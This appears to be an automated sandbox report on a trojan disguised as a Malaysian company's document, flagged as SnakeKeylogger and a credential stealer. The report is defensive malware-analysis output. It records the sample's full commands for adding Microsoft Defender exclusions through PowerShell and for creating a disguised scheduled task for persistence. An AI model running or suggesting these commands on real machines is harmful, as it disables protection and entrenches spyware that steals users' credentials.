Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B5968 20_2_056B5968
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BAA78 20_2_056BAA78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BCA58 20_2_056BCA58
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BC788 20_2_056BC788
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BFC48 20_2_056BFC48
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BEC0B 20_2_056BEC0B
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B3E09 20_2_056B3E09
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B29EC 20_2_056B29EC
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056BF804 20_2_056BF804
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_056B3AA1 20_2_056B3AA1
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07030B30 20_2_07030B30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07031BA8 20_2_07031BA8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_070397B0 20_2_070397B0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07032288 20_2_07032288
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07035290 20_2_07035290
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07039ED8 20_2_07039ED8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07032970 20_2_07032970
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703CF08 20_2_0703CF08
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07030B20 20_2_07030B20
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703D360 20_2_0703D360
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07031B97 20_2_07031B97
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703D7B8 20_2_0703D7B8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07038E08 20_2_07038E08
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703F620 20_2_0703F620
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703FA6A 20_2_0703FA6A
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07039E71 20_2_07039E71
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703FA78 20_2_0703FA78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07032278 20_2_07032278
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07035280 20_2_07035280
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703E917 20_2_0703E917
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703E918 20_2_0703E918
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07032962 20_2_07032962
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703ED70 20_2_0703ED70
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07039590 20_2_07039590
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703F1C8 20_2_0703F1C8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07038DF9 20_2_07038DF9
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703DC01 20_2_0703DC01
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703DC10 20_2_0703DC10
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07030031 20_2_07030031
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_07030040 20_2_07030040
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703E067 20_2_0703E067
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703E068 20_2_0703E068
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703E4BF 20_2_0703E4BF
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 20_2_0703E4C0 20_2_0703E4C0
Sample file is different than original file name gathered from version info
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1278452695.00000000005DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1289770203.00000000065B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.0000000003479000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1291849942.0000000007200000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732851560.0000000000D37000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Binary or memory string: OriginalFilenamewxHw.exe6 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Uses 32bit PE files
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GhrKoSGuCdvpJ.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, -O--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, -O--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, -O--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, -O--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, HecPmJ6gFWvqumjiqv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs Security API names: _0020.SetAccessControl
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs Security API names: _0020.AddAccessRule
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs Security API names: _0020.SetAccessControl
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs Security API names: _0020.AddAccessRule
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, HecPmJ6gFWvqumjiqv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File created: C:\Users\user\AppData\Local\Temp\tmp8289.tmp Jump to behavior
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000003028000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.000000000301C000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000034AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Virustotal: Detection: 60%
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe File read: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
